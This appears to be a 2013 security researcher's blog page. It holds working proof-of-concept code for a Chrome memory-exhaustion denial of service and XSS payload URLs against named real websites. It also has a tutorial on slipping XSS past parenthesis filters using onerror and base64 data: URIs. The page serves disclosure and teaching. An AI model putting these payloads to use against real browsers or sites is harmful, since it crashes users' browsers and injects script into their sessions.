- Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
<script> var r="BOMB!";for(var e=0;e<22;e++){r+=r;} for(var d=0;d<100000;d++) { history.pushState({},r); } </script>
Live demo
On android 4.2.2 @ nexus 7 this is quicker:<script> var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));} history.pushState({},r,r); </script>
- pear.php.net XSS
http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)
- satoshiroulette.com (bitcoin casino) XSS :
Examples:
http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
Monday, July 22, 2013
In the meantime...
Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:
Saturday, July 6, 2013
XSS parentheses and brackets filter bypassing
Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION --> ... <img src="<?php echo $_GET['filename']"; ?> > ...One approach is to use exceptions as is described here. So the injected code (filename param) should look like this:
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="Resulting in:
<!-- http://example.com/image.php?filename=INJECTION --> ... <img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" > ...But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and "data:" URI with base64 encoding. Let's inject <script>alert("XSS")<script/> code (in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So crafted parameter should look like this:
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="Resulting in:
<!-- http://example.com/image.php?filename=INJECTION --> ... <img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" > ...